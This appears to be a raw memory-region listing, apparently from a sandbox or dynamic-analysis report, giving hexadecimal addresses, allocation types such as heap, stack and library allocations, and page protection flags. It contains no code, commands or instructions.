1E002D2A000
trusted library allocation
page read and write
16A0000
trusted library allocation
page read and write
1A60187F000
heap
page read and write
12140000
trusted library allocation
page read and write
23D52B50000
heap
page read and write
16A0000
trusted library allocation
page read and write
1F72ED51000
heap
page read and write
2D8F6172000
heap
page read and write
7FFE10241000
unkown
page execute and read and write
19DCB061000
heap
page read and write
256E8B31000
heap
page read and write
2D8F64A1000
heap
page read and write
121C0000
trusted library allocation
page read and write
24310E04000
heap
page read and write
7FFDFB019000
unkown
page execute and read and write
2D8F3C60000
heap
page read and write
167E7EF0000
heap
page read and write
2D8F64D8000
heap
page read and write
7FFD9AFB0000
trusted library allocation
page read and write
16A0000
trusted library allocation
page read and write
1764ECD000
stack
page read and write
24310B40000
heap
page read and write
2191890A000
heap
page read and write
196D8991000
heap
page read and write
1E01AD56000
heap
page read and write
20CA0930000
heap
page read and write
121C0000
trusted library allocation
page read and write
7FFD9AF80000
trusted library allocation
page read and write
1A49C37A000
heap
page read and write
24EF2800000
heap
page read and write
2D8F72D4000
direct allocation
page read and write
1D9205E0000
heap
page read and write
19CBDB54000
heap
page read and write
2D8F64E7000
heap
page read and write
2E4A9A75000
heap
page read and write
B5328BB000
stack
page read and write
8F445AD000
stack
page read and write
2E4A9A5B000
heap
page read and write
2D8F3C2F000
heap
page read and write
21645AB9000
heap
page read and write
2D8F6102000
heap
page read and write
1DC70DA0000
heap
page read and write
1E000A70000
heap
page read and write
2D8F5550000
heap
page read and write
121C0000
trusted library allocation
page read and write
2D8F6A24000
direct allocation
page read and write
1C378A30000
heap
page read and write
121C0000
trusted library allocation
page read and write
B53227A000
stack
page read and write
17A516D0000
heap
page read and write
C7E000
stack
page read and write
4C2D47F000
stack
page read and write
16A0000
trusted library allocation
page read and write
2D8F3C54000
heap
page read and write
830000
heap
page read and write
121C0000
trusted library allocation
page read and write
2D8F6658000
heap
page read and write
16A0000
trusted library allocation
page read and write
2D8F5DF5000
heap
page read and write
43161BE000
stack
page read and write
8E62FF000
unkown
page read and write
1E002450000
trusted library allocation
page read and write
2D8F649A000
heap
page read and write
1E01ABE5000
heap
page read and write
84176FF000
stack
page read and write
5F65C7F000
stack
page read and write
83D70FF000
stack
page read and write
7FFE130C0000
unkown
page readonly
2D8F3C60000
heap
page read and write
2197E17E000
heap
page read and write
2D8F64A6000
heap
page read and write
2D8F60C9000
heap
page read and write
2D8F5E41000
heap
page read and write
2D8F3C47000
heap
page read and write
2D8F64FA000
heap
page read and write
7FF623FB4000
unkown
page readonly
C3B000
stack
page read and write
2D8F6780000
direct allocation
page read and write
19CBBDBE000
heap
page read and write
7FFD9AEE4000
trusted library allocation
page read and write
181AD8E0000
direct allocation
page read and write
2D8F6487000
heap
page read and write
2D8F64C1000
heap
page read and write
286A50C0000
heap
page read and write
EC7000
heap
page read and write
7FFD9AF30000
trusted library allocation
page read and write
A7A518E000
stack
page read and write
16A0000
trusted library allocation
page read and write
282B62B1000
heap
page read and write
2D8F647C000
heap
page read and write
16A0000
trusted library allocation
page read and write
E80000
trusted library allocation
page read and write
2D8F6680000
direct allocation
page read and write
7FFDFAEE0000
unkown
page readonly
EA8000
heap
page read and write
7FF623F9B000
unkown
page readonly
2D199CB8000
heap
page read and write
2D8F63DE000
heap
page read and write
20DBCB99000
heap
page read and write
17A51521000
heap
page read and write
23A0FFF7000
heap
page read and write
27CC37C0000
heap
page read and write
7FFD9AE90000
trusted library allocation
page read and write
1F72ED30000
heap
page read and write
1316000
heap
page read and write
181AD80E000
heap
page read and write
2D8F6630000
heap
page read and write
2AF86534000
heap
page read and write
13DF6C4A000
heap
page read and write
2D8F3CAC000
heap
page read and write
282B62B1000
heap
page read and write
7FFD9ADD6000
trusted library allocation
page execute and read and write
1E012B01000
trusted library allocation
page read and write
2D8F3C60000
heap
page read and write
2D8F5E5D000
heap
page read and write
7FFD9B0F0000
trusted library allocation
page read and write
1FE983CB000
heap
page read and write
1D8A000
heap
page read and write
2D8F6A98000
direct allocation
page read and write
236FDE90000
heap
page read and write
19CBC27E000
heap
page read and write
26531898000
heap
page read and write
E93000
heap
page read and write
266C29B0000
heap
page read and write
7FFDFA1C3000
unkown
page execute and read and write
2D8F64E7000
heap
page read and write
2D8F63B4000
heap
page read and write
2D8F6080000
heap
page read and write
181AD923000
direct allocation
page read and write
F7F5EF000
stack
page read and write
21E8EEB8000
heap
page read and write
13DF6AE0000
heap
page read and write
2197E901000
heap
page read and write
7FFDFB771000
unkown
page execute and read and write
19DCB030000
heap
page read and write
19CBBB10000
heap
page read and write
21EE58B7000
heap
page read and write
7FFD9AF70000
trusted library allocation
page read and write
2D8F6472000
heap
page read and write
2D8F64EF000
heap
page read and write
1E000AFB000
heap
page read and write
2D8F667E000
heap
page read and write
34427FE000
unkown
page read and write
21E8EE60000
heap
page read and write
235B31C9000
heap
page read and write
16A0000
trusted library allocation
page read and write
7FFD9B050000
trusted library allocation
page read and write
2D8F667D000
heap
page read and write
2D8F6B47000
heap
page read and write
1690000
heap
page readonly
4C2D5FC000
stack
page read and write
20CA072A000
heap
page read and write
5190000
trusted library allocation
page read and write
282B6254000
heap
page read and write
21910211000
trusted library allocation
page read and write
219186DA000
heap
page read and write
12140000
trusted library allocation
page read and write
2D8F667D000
heap
page read and write
2AF862E2000
heap
page read and write
2197E0C0000
heap
page read and write
4315BE6000
stack
page read and write
2D8F64FA000
heap
page read and write
2D8F60AF000
heap
page read and write
19CBBB63000
heap
page read and write
19DCC995000
heap
page read and write
2D8F60F7000
heap
page read and write
121C0000
trusted library allocation
page read and write
256F2B80000
heap
page read and write
2D8F5E5B000
heap
page read and write
2D8F658A000
heap
page read and write
2D8F64C6000
heap
page read and write
2D8F3BA0000
heap
page read and write
181AD7A6000
heap
page read and write
16A0000
trusted library allocation
page read and write
16A0000
trusted library allocation
page read and write
1A601872000
heap
page read and write
1F72F0A4000
heap
page read and write
7FFD9B060000
trusted library allocation
page read and write
19DCB06D000
heap
page read and write
7FFE148EC000
unkown
page execute and write copy
236FDE10000
heap
page read and write
63F03FF000
unkown
page read and write
28A22061000
heap
page read and write
181B0DE9000
direct allocation
page read and write
2D8F5E51000
heap
page read and write
1A601860000
heap
page read and write
256E8AB4000
heap
page read and write
121C0000
trusted library allocation
page read and write
181B0D50000
direct allocation
page read and write
7FF63426B000
unkown
page readonly
19DCB061000
heap
page read and write
13DF6C61000
heap
page read and write
12140000
trusted library allocation
page read and write
219018E5000
trusted library allocation
page read and write
121C0000
trusted library allocation
page read and write
1E002F20000
trusted library allocation
page read and write
12140000
trusted library allocation
page read and write
201E0140000
heap
page read and write
181AD81A000
heap
page read and write
427DCFF000
unkown
page read and write
1C0F000
stack
page read and write
2D8F6151000
heap
page read and write
2D8F6C5C000
heap
page read and write
21900408000
trusted library allocation
page read and write
2D8F6281000
heap
page read and write
2AF862A0000
heap
page read and write
286A5270000
heap
page read and write
2D8F64C6000
heap
page read and write
16A0000
trusted library allocation
page read and write
181AD7D9000
heap
page read and write
7FFE11510000
unkown
page readonly
21645CF0000
heap
page read and write
121C0000
trusted library allocation
page read and write
17A51517000
heap
page read and write
2625EB08000
heap
page read and write
2D8F64C6000
heap
page read and write
5142000
trusted library allocation
page read and write
1E01AB00000
heap
page read and write
AA5AE7E000
stack
page read and write
121C0000
trusted library allocation
page read and write
7FFDFB03D000
unkown
page execute and read and write
20DBCBA2000
heap
page read and write
20DBCD70000
heap
page read and write
2D8F632E000
heap
page read and write
2D8F63EF000
heap
page read and write
14000A000
unkown
page readonly
2E4A9A74000
heap
page read and write
314C000
stack
page read and write
19CBBDB4000
heap
page read and write
2D8F6626000
heap
page read and write
12140000
trusted library allocation
page read and write
E30000
trusted library allocation
page read and write
7FFD9AFE0000
trusted library allocation
page read and write
2D8F64D5000
heap
page read and write
2D8F64D8000
heap
page read and write
5180000
trusted library allocation
page read and write
290CDFF000
unkown
page read and write
2AF86280000
heap
page read and write
1F52ECF0000
heap
page read and write
2D8F6638000
heap
page read and write
121C0000
trusted library allocation
page read and write
2D8F3C54000
heap
page read and write
2E4A9A20000
heap
page read and write
2D8F63F8000
heap
page read and write
2D8F6D64000
heap
page read and write
181AD7B3000
heap
page read and write
2D8F3C5B000
heap
page read and write
7FFDFAF84000
unkown
page execute and read and write
5550000
heap
page read and write
1E00455C000
trusted library allocation
page read and write
1E000C00000
trusted library allocation
page read and write
2D8F60B5000
heap
page read and write
7FFE0145E000
unkown
page execute and read and write
2D8F6AA8000
direct allocation
page read and write
2D8F5DDD000
heap
page read and write
16A0000
trusted library allocation
page read and write
7FFE126FB000
unkown
page read and write
21E8EE80000
heap
page read and write
2D8F6350000
heap
page read and write
7FFE1023E000
unkown
page execute and read and write
BAA453D000
stack
page read and write
E33000
trusted library allocation
page execute and read and write
B532537000
stack
page read and write
19CBBB80000
heap
page read and write
7FFDFB2C8000
unkown
page execute and read and write
2D8F6496000
heap
page read and write
2D8F5A40000
direct allocation
page read and write
13DF6C61000
heap
page read and write
23D52B58000
heap
page read and write
7FF623FAE000
unkown
page write copy
CDAD57E000
stack
page read and write
1DC711E4000
heap
page read and write
19CBBDE0000
heap
page read and write
19CBBDB5000
heap
page read and write
2D8F64BE000
heap
page read and write
1D92068A000
heap
page read and write
219188FE000
heap
page read and write
181AD760000
heap
page read and write
7FFDFB778000
unkown
page read and write
23D52B5B000
heap
page read and write
236FDE96000
heap
page read and write
7FFD9ADA6000
trusted library allocation
page read and write
2D8F64A5000
heap
page read and write
2D199C10000
heap
page read and write
1C34C450000
unkown
page read and write
2ECE000
stack
page read and write
2D8F6466000
heap
page read and write
21645AAD000
heap
page read and write
2D8F659F000
heap
page read and write
2D8F661B000
heap
page read and write
2D8F6440000
heap
page read and write
2D8F6301000
heap
page read and write
2D8F63B4000
heap
page read and write
16A0000
trusted library allocation
page read and write
280B55D0000
heap
page read and write
4C2D57F000
stack
page read and write
21E8EEA6000
heap
page read and write
7FF771DB0000
unkown
page readonly
19CBC2A2000
heap
page read and write
19CBBB63000
heap
page read and write
7FF633FEC000
unkown
page read and write
2D8F6634000
heap
page read and write
13DF6BE0000
heap
page read and write
256E8AB0000
heap
page read and write
19DCB040000
heap
page read and write
278961F9000
heap
page read and write
2D8F5E6C000
heap
page read and write
1C34C430000
heap
page read and write
2AF862C0000
heap
page read and write
2197E7E0000
heap
page read and write
2D8F6678000
heap
page read and write
83D6FFF000
unkown
page read and write
2625EB10000
heap
page read and write
7FFE0EB5E000
unkown
page execute and read and write
7FFE13300000
unkown
page readonly
12F8000
heap
page read and write
77BF0FE000
stack
page read and write
20DBCB9E000
heap
page read and write
48C5DCD000
stack
page read and write
2D8F63DA000
heap
page read and write
19CBDB42000
heap
page read and write
19CBBB64000
heap
page read and write
1D82000
heap
page read and write
5F65CFE000
stack
page read and write
20CA0720000
heap
page read and write
2D8F5E5D000
heap
page read and write
7FF623FB4000
unkown
page readonly
1A601869000
heap
page read and write
7FFE10268000
unkown
page read and write
512934F000
stack
page read and write
16A0000
trusted library allocation
page read and write
7FFDFAF54000
unkown
page execute and read and write
E34000
trusted library allocation
page read and write
236FE200000
heap
page read and write
2D8F64B4000
heap
page read and write
282ACF74000
heap
page read and write
1F52F090000
heap
page read and write
2D8F64C2000
heap
page read and write
16A0000
trusted library allocation
page read and write
2E4A9A81000
heap
page read and write
256F2BB0000
heap
page read and write
63F02FC000
stack
page read and write
2D8F5D9D000
heap
page read and write
256E8B29000
heap
page read and write
19CBC299000
heap
page read and write
19CBBDBA000
heap
page read and write
2D8F667D000
heap
page read and write
181B0CE0000
direct allocation
page read and write
19CBBB78000
heap
page read and write
7FFE126F9000
unkown
page execute and write copy
2D8F6357000
heap
page read and write
2197E800000
heap
page read and write
21E8ED60000
heap
page read and write
4C2D4FF000
stack
page read and write
2D8F64C6000
heap
page read and write
7FFE148EB000
unkown
page execute and read and write
D90000
heap
page read and write
8400000
direct allocation
page read and write
282ACF40000
heap
page read and write
7FFD9AEA0000
trusted library allocation
page read and write
2D8F637E000
heap
page read and write
263BF120000
heap
page read and write
2D8F646C000
heap
page read and write
2D199CA0000
heap
page read and write
AF3887E000
stack
page read and write
7FF771DB0000
unkown
page readonly
19CBC29A000
heap
page read and write
121C0000
trusted library allocation
page read and write
23A0FFF0000
heap
page read and write
2D8F5E41000
heap
page read and write
2D8F6AAC000
direct allocation
page read and write
3039CFF000
unkown
page read and write
2D8F64DA000
heap
page read and write
1E0047BC000
trusted library allocation
page read and write
2D8F5DA0000
heap
page read and write
27CC3740000
heap
page read and write
19CBBDA0000
heap
page read and write
181AD7A0000
heap
page read and write
19CBDB44000
heap
page read and write
19CBBD30000
trusted library allocation
page read and write
181AD803000
heap
page read and write
AAA77FF000
stack
page read and write
2197E901000
heap
page read and write
3D2EFFF000
unkown
page read and write
21E8F054000
heap
page read and write
7D9FBF5000
stack
page read and write
16A0000
trusted library allocation
page read and write
27CC37B8000
heap
page read and write
7FFD9B049000
trusted library allocation
page read and write
2D8F64DA000
heap
page read and write
17A51521000
heap
page read and write
F025FDC000
stack
page read and write
7FFD9AD0B000
trusted library allocation
page read and write
2D8F6093000
heap
page read and write
2D8F64A6000
heap
page read and write
5210000
trusted library allocation
page read and write
2D8F3C5E000
heap
page read and write
2D8F64D1000
heap
page read and write
20DBCBC2000
heap
page read and write
21918A11000
heap
page read and write
2197E18A000
heap
page read and write
2D8F649E000
heap
page read and write
2D8F646F000
heap
page read and write
181B0CC0000
direct allocation
page read and write
16A0000
trusted library allocation
page read and write
219104CE000
trusted library allocation
page read and write
256E8B1A000
heap
page read and write
2E4A9A81000
heap
page read and write
7FFD9B050000
trusted library allocation
page read and write
2D8F60B5000
heap
page read and write
7FFDFB24D000
unkown
page execute and read and write
2D8F6352000
heap
page read and write
5156000
trusted library allocation
page read and write
2D8F6483000
heap
page read and write
E90000
heap
page read and write
21014FB0000
heap
page read and write
5120000
trusted library allocation
page read and write
256E8CE0000
heap
page read and write
278961F0000
heap
page read and write
121C0000
trusted library allocation
page read and write
FD8F5FE000
stack
page read and write
28A2204B000
heap
page read and write
2197E186000
heap
page read and write
2D8F3CA5000
heap
page read and write
2D8F6666000
heap
page read and write
19CBC284000
heap
page read and write
7FFDFB2F2000
unkown
page execute and read and write
2D8F72DC000
direct allocation
page read and write
2D8F6460000
heap
page read and write
2D8F64C6000
heap
page read and write
21447470000
heap
page read and write
2E4A9A75000
heap
page read and write
2D8F667B000
heap
page read and write
181B0BA0000
direct allocation
page read and write
7FFE11526000
unkown
page execute and write copy
1DC711E0000
heap
page read and write
2D199F34000
heap
page read and write
F083A9C000
stack
page read and write
FD8F67F000
stack
page read and write
20DBCB93000
heap
page read and write
EAE25CE000
stack
page read and write
7FF633FEA000
unkown
page readonly
21E8F050000
heap
page read and write
21918A61000
heap
page read and write
7FFE126F8000
unkown
page execute and read and write
F0262FE000
unkown
page read and write
1291000
heap
page read and write
2D8F6482000
heap
page read and write
181AD81E000
heap
page read and write
121C0000
trusted library allocation
page read and write
2FCF000
stack
page read and write
1C378808000
heap
page read and write
21645ABA000
heap
page read and write
282ACFC1000
heap
page read and write
16A0000
trusted library allocation
page read and write
1E000AF9000
heap
page read and write
2AF862E0000
heap
page read and write
2D8F663E000
heap
page read and write
2D8F3C3E000
heap
page read and write
4C2D97E000
stack
page read and write
2D8F662B000
heap
page read and write
1E0039D7000
trusted library allocation
page read and write
7FFDFB6F9000
unkown
page execute and read and write
12100000
trusted library allocation
page read and write
167E8030000
heap
page read and write
24EF2B05000
heap
page read and write
2C0E000
stack
page read and write
B5324BE000
stack
page read and write
2070D481000
heap
page read and write
19F0DAF000
stack
page read and write
7FFE13341000
unkown
page readonly
1E01B030000
heap
page read and write
1DC70E51000
heap
page read and write
12140000
trusted library allocation
page read and write
2D8F658A000
heap
page read and write
2D8F6118000
heap
page read and write
16A0000
trusted library allocation
page read and write
2D8F64DA000
heap
page read and write
2D8F3C2F000
heap
page read and write
324C000
stack
page read and write
7FFD9B000000
trusted library allocation
page read and write
2D8F5DE0000
heap
page read and write
1C378A35000
heap
page read and write
215A32A5000
heap
page read and write
1239000
heap
page read and write
181B0DED000
direct allocation
page read and write
16A0000
trusted library allocation
page read and write
1327000
heap
page read and write
21901A71000
trusted library allocation
page read and write
2D8F6440000
heap
page read and write
256F2C3D000
heap
page read and write
7FFD9AFA0000
trusted library allocation
page read and write
1FE0000
direct allocation
page execute and read and write
2D8F63B4000
heap
page read and write
7FFE13323000
unkown
page read and write
2D8F63F3000
heap
page read and write
1E000B70000
heap
page read and write
DE697CB000
stack
page read and write
121C0000
trusted library allocation
page read and write
280B56E4000
heap
page read and write
181AD927000
direct allocation
page read and write
2D8F6381000
heap
page read and write
121C0000
trusted library allocation
page read and write
215A34B0000
heap
page read and write
121C0000
trusted library allocation
page read and write
1B091990000
heap
page read and write
7FFDFAF56000
unkown
page execute and read and write
1FD0000
direct allocation
page execute and read and write
4C2E54E000
stack
page read and write
2D8F6487000
heap
page read and write
24EF2A10000
heap
page read and write
E448B7F000
stack
page read and write
16A0000
trusted library allocation
page read and write
1E000ABD000
heap
page read and write
1F72ED51000
heap
page read and write
2D8F64DA000
heap
page read and write
219187CA000
heap
page read and write
29532800000
heap
page read and write
F0E9DD8000
stack
page read and write
2D8F6281000
heap
page read and write
3D2F0FF000
stack
page read and write
2D8F5DF5000
heap
page read and write
7FFD9AEC0000
trusted library allocation
page execute and read and write
265319A0000
heap
page read and write
CD6AD7E000
stack
page read and write
A7A54FF000
stack
page read and write
2D8F5DE3000
heap
page read and write
2D8F64F1000
heap
page read and write
1A49C388000
heap
page read and write
2D8F64B4000
heap
page read and write
1DC70E51000
heap
page read and write
7FFD9B044000
trusted library allocation
page read and write
2197E090000
heap
page read and write
21918A41000
heap
page read and write
140009000
unkown
page read and write
B98FFFF000
stack
page read and write
2D8F6380000
heap
page read and write
7FF77203E000
unkown
page readonly
282ACFC1000
heap
page read and write
2D8F6301000
heap
page read and write
20CA0741000
heap
page read and write
19F11FE000
stack
page read and write
2D8F3C60000
heap
page read and write
7FFD9AF10000
trusted library allocation
page read and write
1D920680000
heap
page read and write
F54000
heap
page read and write
2D8F6440000
heap
page read and write
7FFD9AF10000
trusted library allocation
page read and write
7FFD9AF50000
trusted library allocation
page read and write
7FFE126EB000
unkown
page execute and read and write
2D8F64C2000
heap
page read and write
19CBBB71000
heap
page read and write
B53217F000
stack
page read and write
7FFD9AF20000
trusted library allocation
page read and write
265318A1000
heap
page read and write
2D8F662B000
heap
page read and write
7FFD9AF60000
trusted library allocation
page read and write
23DAA274000
heap
page read and write
63F04FF000
stack
page read and write
2D8F6658000
heap
page read and write
21EE57E0000
heap
page read and write
7FFE13317000
unkown
page execute and read and write
E5A000
trusted library allocation
page execute and read and write
2D8F55F0000
heap
page read and write
121C0000
trusted library allocation
page read and write
27CC37C0000
heap
page read and write
16A0000
trusted library allocation
page read and write
121C0000
trusted library allocation
page read and write
5530000
trusted library allocation
page execute and read and write
235B34A4000
heap
page read and write
1C8E000
stack
page read and write
215A32D4000
heap
page read and write
2D8F6B47000
heap
page read and write
219187D3000
heap
page read and write
34426FC000
stack
page read and write
282ACFBB000
heap
page read and write
1E000ABF000
heap
page read and write
1FE983C0000
heap
page read and write
1E000C70000
heap
page read and write
7FFD9AD1B000
trusted library allocation
page read and write
21447500000
heap
page read and write
102FFF000
stack
page read and write
295326D0000
heap
page read and write
20DBCBCC000
heap
page read and write
1DC70E30000
heap
page read and write
7FFE12E1A000
unkown
page execute and write copy
7FF633FE1000
unkown
page execute read
7FFDFB2F6000
unkown
page execute and write copy
196D898A000
heap
page read and write
16A0000
trusted library allocation
page read and write
121C0000
trusted library allocation
page read and write
2D8F5DE5000
heap
page read and write
6A0000
heap
page read and write
7FFD9AEAA000
trusted library allocation
page read and write
2D8F64B0000
heap
page read and write
278963A4000
heap
page read and write
7FF771DB1000
unkown
page execute read
16A0000
trusted library allocation
page read and write
2D8F3C82000
heap
page read and write
13DF6C61000
heap
page read and write
7FFD9B030000
trusted library allocation
page read and write
19CBBDBA000
heap
page read and write
51292CC000
stack
page read and write
2D8F64C6000
heap
page read and write
1218000
trusted library allocation
page read and write
2D8F631D000
heap
page read and write
1E002B01000
trusted library allocation
page read and write
2E4A9A7B000
heap
page read and write
2D8F5DF5000
heap
page read and write
121C0000
trusted library allocation
page read and write
196D88F0000
heap
page read and write
26531AF4000
heap
page read and write
19DCB061000
heap
page read and write
2197E182000
heap
page read and write
B89C7CC000
stack
page read and write
215A32AB000
heap
page read and write
19CBBDB3000
heap
page read and write
282B61E0000
heap
page read and write
2D8F64B8000
heap
page read and write
121C0000
trusted library allocation
page read and write
29532804000
heap
page read and write
181AD7A3000
heap
page read and write
A7A508D000
stack
page read and write
DE69BFF000
stack
page read and write
7FFD9B140000
trusted library allocation
page read and write
196D8810000
heap
page read and write
6600000
direct allocation
page read and write
1C34C655000
heap
page read and write
3D2EEFC000
stack
page read and write
E1E000
stack
page read and write
19CBC288000
heap
page read and write
7FF623F71000
unkown
page execute read
7A6D8FF000
unkown
page read and write
140001000
unkown
page execute read
24310B80000
heap
page read and write
16B5000
heap
page read and write
1200000
heap
page read and write
2D8F64EF000
heap
page read and write
2D8F3C5B000
heap
page read and write
85448FF000
unkown
page read and write
19DCB061000
heap
page read and write
116E000
stack
page read and write
51F0000
heap
page execute and read and write
2953250A000
heap
page read and write
2D8F63A3000
heap
page read and write
219001C7000
heap
page execute and read and write
2A62F6B0000
heap
page read and write
2D8F63AE000
heap
page read and write
24EF2810000
heap
page read and write
181AD7CA000
heap
page read and write
2070D3D0000
heap
page read and write
29532810000
heap
page read and write
2D8F6621000
heap
page read and write
1302000
heap
page read and write
219104EC000
trusted library allocation
page read and write
263BF240000
heap
page read and write
16A0000
trusted library allocation
page read and write
7FFE10314000
unkown
page execute and read and write
19DCAF70000
heap
page read and write
16A0000
trusted library allocation
page read and write
7FFD9ADC0000
trusted library allocation
page execute and read and write
19CBBB8F000
heap
page read and write
1B091D85000
heap
page read and write
7FFD9ACF0000
trusted library allocation
page read and write
5EC0000
trusted library allocation
page execute and read and write
2197E3C4000
heap
page read and write
219010A5000
trusted library allocation
page read and write
19DCB06D000
heap
page read and write
20DBCB70000
heap
page read and write
121C0000
trusted library allocation
page read and write
F083B1F000
stack
page read and write
19CBBB75000
heap
page read and write
5134000
trusted library allocation
page read and write
4DCE000
stack
page read and write
2D8F63F6000
heap
page read and write
B3C2DFF000
stack
page read and write
2E4A9A8A000
heap
page read and write
12140000
trusted library allocation
page read and write
5F6594B000
stack
page read and write
7FFD9AF70000
trusted library allocation
page read and write
12140000
trusted library allocation
page read and write
21645AC7000
heap
page read and write
2D8F64C6000
heap
page read and write
2D8F65FA000
heap
page read and write
7FFDFB746000
unkown
page execute and read and write
19CBDB43000
heap
page read and write
1E0025E0000
trusted library section
page read and write
23A0FFFB000
heap
page read and write
7FFE13331000
unkown
page execute read
21918970000
heap
page read and write
16A0000
trusted library allocation
page read and write
7FF771DBC000
unkown
page read and write
34099FE000
stack
page read and write
1764FCE000
stack
page read and write
A3550FE000
stack
page read and write
215A32CF000
heap
page read and write
21645AAD000
heap
page read and write
7FFD9B120000
trusted library allocation
page execute and read and write
219001D0000
heap
page execute and read and write
12D0000
heap
page read and write
340987F000
stack
page read and write
21E8F071000
heap
page read and write
2D8F5DDC000
heap
page read and write
19CBDB41000
heap
page read and write
282ACFC1000
heap
page read and write
1D920500000
heap
page read and write
1E0043E7000
trusted library allocation
page read and write
2E4A9A7C000
heap
page read and write
181B0C40000
direct allocation
page read and write
1A601AA0000
heap
page read and write
4C2D9FE000
stack
page read and write
F083B9F000
stack
page read and write
1A49C2B0000
heap
page read and write
7FFD9AD10000
trusted library allocation
page read and write
22156728000
heap
page read and write
181AD920000
direct allocation
page read and write
2D8F6C5C000
heap
page read and write
EAE000
heap
page read and write
7FFE10231000
unkown
page execute and read and write
2D8F64A6000
heap
page read and write
21918A6B000
heap
page read and write
1A601A40000
heap
page read and write
7FFD9AD20000
trusted library allocation
page read and write
16A0000
trusted library allocation
page read and write
2D8F648B000
heap
page read and write
2D8F64D1000
heap
page read and write
20871374000
heap
page read and write
24EF2B00000
heap
page read and write
2D8F72E2000
heap
page read and write
2625EAF0000
heap
page read and write
2E4A9C00000
heap
page read and write
21645ACC000
heap
page read and write
380070C000
stack
page read and write
282ACFC1000
heap
page read and write
2D8F665F000
heap
page read and write
19CBC28E000
heap
page read and write
19CBC288000
heap
page read and write
2D8F5DD4000
heap
page read and write
23D52B5D000
heap
page read and write
2D8F63E1000
heap
page read and write
20DBCB78000
heap
page read and write
19CBBD30000
trusted library allocation
page read and write
7FFD9ADE6000
trusted library allocation
page execute and read and write
27CC3760000
heap
page read and write
2D8F5E41000
heap
page read and write
235B3130000
heap
page read and write
402000
unkown
page readonly
235B31C0000
heap
page read and write
2D8F64DA000
heap
page read and write
2D8F6D64000
heap
page read and write
1E01AD00000
heap
page read and write
19CBBB89000
heap
page read and write
E6B000
trusted library allocation
page execute and read and write
1C34C4A0000
heap
page read and write
2D8F64D5000
heap
page read and write
2D8F6668000
heap
page read and write
263BF140000
heap
page read and write
1326000
heap
page read and write
1326000
heap
page read and write
2D8F5D9D000
heap
page read and write
2D8F64AE000
heap
page read and write
1E002507000
heap
page execute and read and write
21645AA7000
heap
page read and write
B53273F000
stack
page read and write
7FF623F70000
unkown
page readonly
2AF86540000
heap
page read and write
7FFE1331F000
unkown
page execute and read and write
201E0274000
heap
page read and write
5438000
stack
page read and write
2D8F646F000
heap
page read and write
2D8F649E000
heap
page read and write
1A60188F000
heap
page read and write
2D8F60A7000
heap
page read and write
1C34C350000
heap
page read and write
300E000
stack
page read and write
34428FF000
stack
page read and write
181AD7FF000
heap
page read and write
7FFDFB73C000
unkown
page execute and read and write
282B6460000
heap
page read and write
181B0B80000
direct allocation
page read and write
2070D46A000
heap
page read and write
13DF6D40000
heap
page read and write
2D8F649E000
heap
page read and write
19CBC2A2000
heap
page read and write
2D8F64D5000
heap
page read and write
29532521000
heap
page read and write
2D8F6460000
heap
page read and write
2D8F6643000
heap
page read and write
2D8F72E0000
direct allocation
page read and write
27CC37B6000
heap
page read and write
1E01AB46000
heap
page read and write
7FFD9B0E3000
trusted library allocation
page read and write
2E4A9A83000
heap
page read and write
4C2D1EE000
stack
page read and write
2AF862D0000
heap
page read and write
7FFDFA227000
unkown
page read and write
21015324000
heap
page read and write
3CD9000
trusted library allocation
page read and write
19F0D2B000
stack
page read and write
181AD7A4000
heap
page read and write
1D8C000
heap
page read and write
4C2DA7E000
stack
page read and write
2D8F64FA000
heap
page read and write
1312000
heap
page read and write
19CBC287000
heap
page read and write
121C0000
trusted library allocation
page read and write
236FDE20000
heap
page read and write
16A0000
trusted library allocation
page read and write
215A32CD000
heap
page read and write
181AD81C000
heap
page read and write
1E000C10000
heap
page readonly
2D8F6428000
heap
page read and write
21447490000
heap
page read and write
2D8F6450000
heap
page read and write
2D8F61F9000
heap
page read and write
2D8F6B54000
heap
page read and write
2D8F6472000
heap
page read and write
427DDFF000
stack
page read and write
16A0000
trusted library allocation
page read and write
282AD0A0000
heap
page read and write
217B5190000
unkown
page read and write
28A22061000
heap
page read and write
11F0000
heap
page execute and read and write
1A60188D000
heap
page read and write
2D8F5D89000
heap
page read and write
E36F97F000
stack
page read and write
2D8F5DF5000
heap
page read and write
12140000
trusted library allocation
page read and write
266C4500000
heap
page read and write
1200000
direct allocation
page execute read
16A0000
trusted library allocation
page read and write
7FFD9B023000
trusted library allocation
page read and write
2D8F3C2F000
heap
page read and write
16A0000
trusted library allocation
page read and write
12140000
trusted library allocation
page read and write
2D8F647F000
heap
page read and write
7FFD9AFC0000
trusted library allocation
page read and write
21E8EE9F000
heap
page read and write
2D8F6371000
heap
page read and write
2D8F649C000
heap
page read and write
2D8F64E7000
heap
page read and write
1E01B020000
heap
page read and write
16A0000
trusted library allocation
page read and write
2D8F63E0000
heap
page read and write
2653188A000
heap
page read and write
181AD7AC000
heap
page read and write
181AD990000
direct allocation
page read and write
7FFE11527000
unkown
page read and write
1E01AC20000
heap
page read and write
16A0000
trusted library allocation
page read and write
2D8F3C5E000
heap
page read and write
21E8EE9C000
heap
page read and write
140007000
unkown
page readonly
CD6AE7E000
stack
page read and write
1C378640000
heap
page read and write
21447494000
heap
page read and write
26D6BFF000
stack
page read and write
16A0000
trusted library allocation
page read and write
282B6210000
heap
page read and write
1317000
heap
page read and write
FD8F47B000
stack
page read and write
215A32CD000
heap
page read and write
1E01ABFE000
heap
page read and write
256E8B10000
heap
page read and write
CF12C9D000
stack
page read and write
7FFD9B010000
trusted library allocation
page read and write
2191894C000
heap
page read and write
2D8F638F000
heap
page read and write
B89CBFE000
stack
page read and write
2D8F6114000
heap
page read and write
22156950000
heap
page read and write
2E4A9DD0000
heap
page read and write
21918630000
heap
page read and write
DDCBC7D000
stack
page read and write
7FFD9ADBC000
trusted library allocation
page execute and read and write
2D8F6478000
heap
page read and write
2E4A9A91000
heap
page read and write
181AD801000
heap
page read and write
19DCB061000
heap
page read and write
1E01AB0E000
heap
page read and write
2D8F63B4000
heap
page read and write
16A0000
trusted library allocation
page read and write
121C0000
trusted library allocation
page read and write
7FFDFB6FC000
unkown
page execute and read and write
2D8F666F000
heap
page read and write
19CBBB83000
heap
page read and write
27CC3730000
heap
page read and write
7FFD9B040000
trusted library allocation
page read and write
282B62B1000
heap
page read and write
21EE5BD4000
heap
page read and write
21E8EEA6000
heap
page read and write
2625ECC0000
heap
page read and write
236FE204000
heap
page read and write
1A49C370000
heap
page read and write
2D8F64CA000
heap
page read and write
20870FE0000
heap
page read and write
2D8F643A000
heap
page read and write
7FFE10260000
unkown
page execute and read and write
7DF4D7620000
trusted library allocation
page execute and read and write
2D8F64F1000
heap
